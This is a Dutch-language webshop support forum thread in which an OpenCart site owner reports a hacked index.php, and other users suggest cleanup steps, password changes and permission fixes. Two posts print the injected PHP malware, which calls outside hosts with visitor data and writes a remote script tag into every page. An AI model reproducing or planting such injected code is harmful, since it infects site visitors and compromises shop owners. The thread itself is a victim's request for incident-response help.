Page 1 of 1
Site hacked?
Posted: Fri Oct 31, 2014 4:54 pm
by JohanKoers
2 dagen geleden, vond ik het volgende aan het einde van de index.php:
Code: Select all
$wfmd = __url_get_contents(
"http://www.helmol.de/lkmqjx2h.php" . "?fid=55988&info=" . http_build_query( $wfmd ) . "&no=1&allow=1",
2
);
$wfmd = trim( $wfmd );
if( $wfmd !== 'false' ) {
echo "<script type=\"text/javascript\" src=\"http://www.helmol.de/lkmqjx2h.php?id=2136529\"></script>";
}
}
}
#/712434#
?>
Heeft iemand enig idee hoe dit daar is gekomen? Of dit zelf meegemaakt. Zelf hebben we afgelopen dagen niets bijzonders aan shop gedaan. Maar hierdoor werd shop wel behoorlijk in de war geschopt. Het lijkt erop dat backup van de index.php terug zetten het probleem voor nu heeft verholpen. Maar ik maar me toch zorgen hoe het er is gekomen.
Re: Site hacked?
Posted: Fri Oct 31, 2014 9:07 pm
by i2Paq
Zet voortaan dat soort zaken tussen code-haakjes.
Draai je op een eigen server of een shared?
Geen idee wat het is maar het lijk idd. op een hack.
Re: Site hacked?
Posted: Sat Nov 01, 2014 7:16 pm
by JohanKoers
Draai op strato, net weer wat toegevoegd nadat ik backup heb terug gezet
Code: Select all
$gjm = __url_get_contents(
"http://www.browserbob.de/test/python/zyr7bc4v.php" . "?fid=55988&info=" . http_build_query( $gjm ) . "&no=1&allow=1",
2
);
$gjm = trim( $gjm );
if( $gjm !== 'false' ) {
echo "<script type=\"text/javascript\" src=\"http://www.browserbob.de/test/python/zyr7bc4v.php?id=2136529\"></script>";
}
}
}
#/712434#
?>
Re: Site hacked?
Posted: Sat Nov 01, 2014 9:23 pm
by i2Paq
Praat eens met je hoster?
Staan je bestands-permissies wel goed?
Re: Site hacked?
Posted: Sat Nov 01, 2014 10:05 pm
by k2tec
Wie zegt dat de backup schoon was.
Met een goede editor controleren of er ergens anders ook niet rommel staat.
Als het in je index kijk dat ook in je admin index.
Ook de download map, system log en cache.
Als dan de schone OC terug plaatst direct al je wachtwoorden veranderen FTP, MySql, hoster inlog enz.
en niet in janklaasen123
Re: Site hacked?
Posted: Sun Nov 02, 2014 5:52 am
by JohanKoers
Ik ga denk ik schone install doen, vreemde is ook dat als ik op admin inlog mappen geen schijfrechten schijnen te hebben. Terwijl deze wel goed staan. Gaat om volgende mappen.
Waarschuwing: Image directory /mnt/webh/e1/28/52259528/htdocs/webshop/image/ heeft geen schrijfrechten!
Waarschuwing: Image cache directory /mnt/webh/e1/28/52259528/htdocs/webshop/image/cache/ heeft geen schrijfrechten!
Waarschuwing: Image cache directory /mnt/webh/e1/28/52259528/htdocs/webshop/system/cache/ heeft geen schrijfrechten!
Waarschuwing: Download directory /mnt/webh/e1/28/52259528/htdocs/webshop/download/ heeft geen schrijfrechten!
Waarschuwing: Log directory /mnt/webh/e1/28/52259528/htdocs/webshop/system/logs/ heeft geen schrijfrechten!
Iemand nog ideen wat deze snurker allemaal heeft gedaan?
Re: Site hacked?
Posted: Sun Nov 02, 2014 6:21 am
by JohanKoers
Net alle passwords vernieuwd FTP, mysql, Strato login, (idd niet wachtwoord123 e.d., die had ik voorheen ook niet) en nieuwe install gedaan, vreemde is dat bij instalatie de config.php's niet weggeschreven worden. Standaard database word wel aangemaakt. Ik heb zelf maar config.php in dir gezet. En krijg weer partij ellende.
Zie nieuwe install
www.tramach.nl
Site die die gehacked is is
www.tramag.nl
Ik ben sprakeloos, iemand idee?
Re: Site hacked?
Posted: Sun Nov 02, 2014 5:58 pm
by artcore
Het lijkt me een schrijfrechten probleem. Als je de php versie via je hosting op 5.4 kunt zetten zal het wel goed gaan.
Kun je de rechten zien via een ftp programma bijvoorbeeld? Folders moeten op 755 en bestanden op 644 staan.
Re: Site hacked?
Posted: Sun Nov 02, 2014 7:56 pm
by victorj
op dit moment lijkt het erop dat de schrijfrechten voor de map image cache niet goed staan.
verder moet je alle bestanden controleren, groot kans dat er ergens een bestand staat dat dienveranderingen aanbrengt.
maak ook een sql dump van je database en controleer deze op vreemde toevoegingen.
verder even een advies
maak een map aan op je geinfecteerde hosting.
upload hier gewoon een totaal kale schone install van een net gedownloade opencart versie.
maak een nieuwe database aan.
instaleer deze versie en kijk of er wijzigingen optreden.
vanaf een schone install is het veel makelijker zoeken of wr wat veranderd in de bestanden of dat er bestanden bij worden gezet.